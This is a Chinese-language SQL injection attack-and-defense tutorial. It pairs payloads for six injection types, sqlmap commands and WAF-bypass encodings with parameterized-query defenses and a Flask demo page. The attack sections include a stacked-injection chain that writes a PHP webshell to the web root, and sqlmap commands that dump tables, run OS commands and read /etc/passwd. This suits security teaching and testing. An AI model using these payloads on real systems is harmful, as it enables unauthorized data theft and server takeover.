SQL注入攻防指南Web版

---

SQL注入攻防指南Web版

SQL注入（SQL Injection）是Web安全领域最常见的攻击手段之一，攻击者通过构造恶意输入篡改SQL语句逻辑，可能导致数据泄露、数据篡改甚至服务器权限丢失。本文将从攻击原理、实战方法、自动化工具、绕过技巧到防御方案，结合可运行的Web演示系统（基于Python+Flask实现），全面解析SQL注入的攻防技术体系。

---

一、SQL注入攻击原理与分类

1.1 漏洞成因

当用户输入未经过滤直接拼接到SQL语句中时，攻击者可构造特殊输入改变原语句逻辑：

-- 原始语句
SELECT * FROM users WHERE id = '$input'

-- 攻击输入：1' OR '1'='1
-- 篡改后语句
SELECT * FROM users WHERE id = '1' OR '1'='1'

1.2 主要危害

• 数据泄露：窃取用户信息、业务数据
• 数据篡改：修改订单金额、删除数据
• 权限提升：执行系统命令、上传Webshell

1.3 注入类型分类

类型	特征	典型场景
UNION注入	利用UNION合并查询结果	有明确回显位的场景
报错注入	通过错误信息泄露数据	开启错误回显的配置
布尔盲注	根据页面状态差异判断条件真假	无回显但存在状态差异
时间盲注	通过响应延时判断条件真假	无任何直接回显的场景
堆叠注入	执行多条SQL语句	支持多语句执行的数据库
二次注入	恶意数据存储后触发后续注入	存在数据存储再使用的逻辑

---

二、六大注入类型实战详解

2.1 UNION注入（联合查询注入）

攻击流程：

1. 判断注入类型
   id=1 and 1=1 与 id=1 and 1=2
   
2. 闭合字符型注入
   id=1' and '1'='1

3. 探测字段数
   id=1' order by 4--+

4. 确定回显位
   id=-1' union select 1,2,3--+

5. 获取敏感信息
   id=-1' union select 1,database(),@@version--+

2.2 报错注入

利用函数：updatexml()、extractvalue()

-- 获取当前数据库
id=1' and updatexml(1,concat(0x7e,(SELECT database())),3)--+

-- 爆表名（截取前30字符）
id=1' and updatexml(1,concat(0x7e,substring(
  (SELECT group_concat(table_name) 
   FROM information_schema.tables 
   WHERE table_schema=database()),1,30)
),3)--+

2.3 布尔盲注

核心函数：ascii() + substring()

-- 逐字符爆破数据库名
id=1' and ascii(substring((SELECT database()),1,1))>100--+

-- 判断表是否存在
id=1' and (SELECT COUNT(*) FROM users)>0--+

2.4 时间盲注

利用延时函数：sleep()、benchmark()

-- 基础检测
id=1' and if(1=1,sleep(3),0)--+

-- 条件判断
id=1' and if(ascii(substr(database(),1,1))>100,
    benchmark(10000000,md5('test')),0)--+

2.5 堆叠注入

多语句执行（需数据库支持）：

id=1'; CREATE TABLE hack(cmd text);-- 
id=1'; INSERT INTO hack VALUES('<?php system($_GET[cmd]);?>');--
id=1'; SELECT * FROM hack INTO OUTFILE '/var/www/shell.php';--

2.6 二次注入

攻击链示例：

1. 注册恶意用户名
username = admin'-- 
password = any

2. 修改密码触发
UPDATE users SET password='pwned' 
WHERE username='admin'-- ' AND password='old'

---

三、自动化工具SQLMap实战

3.1 基础扫描命令

# 检测注入点
sqlmap -u "http://example.com?id=1"

# 读取请求文件
sqlmap -r request.txt

# 自动确认（非交互模式）
sqlmap -u URL --batch

3.2 数据枚举技巧

# 列出所有数据库
sqlmap -u URL --dbs

# 获取当前数据库
sqlmap -u URL --current-db

# 导出指定表数据
sqlmap -u URL -D testdb -T users --dump

3.3 高级功能

# 执行系统命令
sqlmap -u URL --os-cmd="whoami"

# 文件读写操作
sqlmap -u URL --file-read="/etc/passwd"
sqlmap -u URL --file-write=shell.php --file-dest="/var/www/html"

---

四、WAF绕过技巧

4.1 编码绕过

-- URL编码
id=1%27%20AND%201=1--

-- Unicode编码
id=1\u0027 AND 1=1--

4.2 关键字混淆

-- 内联注释
id=1/*!UNION*//*!SELECT*/1,2,3

-- 空字节截断
id=1%00' AND 1=1--

-- 重复关键字
id=1 UNunionION SELselectECT 1,2,3

4.3 特殊位置注入

POST /login HTTP/1.1
Host: example.com
X-Forwarded-For: 127.0.0.1' AND 1=1--

Cookie: session=1' AND (SELECT 1 FROM users WHERE username='admin')--

---

五、防御方案

5.1 代码层防护

# 错误示例：直接拼接SQL
query = "SELECT * FROM users WHERE id = " + input_id

# 正确方案：参数化查询
cursor.execute("SELECT * FROM users WHERE id = %s", (input_id,))

5.2 输入验证

# 白名单校验（数字类型）
if not input_id.isdigit():
    raise ValueError("Invalid ID format")

# 正则过滤（允许的字符集）
import re
safe_input = re.sub(r"[^a-zA-Z0-9]", "", raw_input)

5.3 安全配置

• 数据库：使用最小权限账户
• 错误处理：关闭详细错误回显
• WAF：部署ModSecurity等Web应用防火墙

---

六、Web演示系统实现

6.1 Flask后端（app.py）

from flask import Flask, render_template

app = Flask(__name__)

@app.route('/')
def index():
    injection_types = [...]  # 注入类型数据集
    sqlmap_params = {...}    # SQLMap参数数据集
    return render_template('index.html', 
                         injections=injection_types,
                         sqlmap=sqlmap_params)

if __name__ == '__main__':
    app.run(debug=True)

6.2 前端界面（index.html）

<!DOCTYPE html>
<html>
<head>
    <title>SQL注入演示系统</title>
    <link href="https://cdn.bootcdn.net/ajax/libs/bootstrap/5.1.3/css/bootstrap.min.css" rel="stylesheet">
    <style>
        .code-block { 
            background: #1e1e1e; 
            color: #d4d4d4; 
            padding: 15px;
            border-radius: 5px;
        }
        .injection-card {
            transition: transform 0.2s;
        }
        .injection-card:hover {
            transform: translateY(-5px);
        }
    </style>
</head>
<body>
    <div class="container py-5">
        <!-- 注入方法展示 -->
        <div class="row">
            {% for type in injections %}
            <div class="col-md-6 mb-4">
                <div class="card injection-card h-100">
                    <div class="card-header bg-primary text-white">
                        {{ type.name }}
                    </div>
                    <div class="card-body">
                        <pre class="code-block">{{ type.example }}</pre>
                    </div>
                </div>
            </div>
            {% endfor %}
        </div>
        
        <!-- SQLMap参数表格 -->
        <table class="table table-striped">
            {% for category, params in sqlmap.items() %}
            <tr>
                <th>{{ category }}</th>
                <td>
                    {% for param in params %}
                    <code>{{ param }}</code><br>
                    {% endfor %}
                </td>
            </tr>
            {% endfor %}
        </table>
    </div>
</body>
</html>

---

七、总结

SQL注入作为OWASP Top 10长期上榜的漏洞类型，其防御需要开发、运维、安全团队的协同合作：

1. 开发阶段：强制使用参数化查询，实施代码审计
2. 测试阶段：进行渗透测试，使用SQLMap等工具验证
3. 运行阶段：部署WAF，监控异常请求

通过本文提供的Web演示系统，读者可直观理解各类型注入的攻击过程。完整代码已开源在GitHub仓库，建议在授权环境下进行实验测试。

防御的本质不是技术对抗，而是建立纵深防御体系和安全开发意识。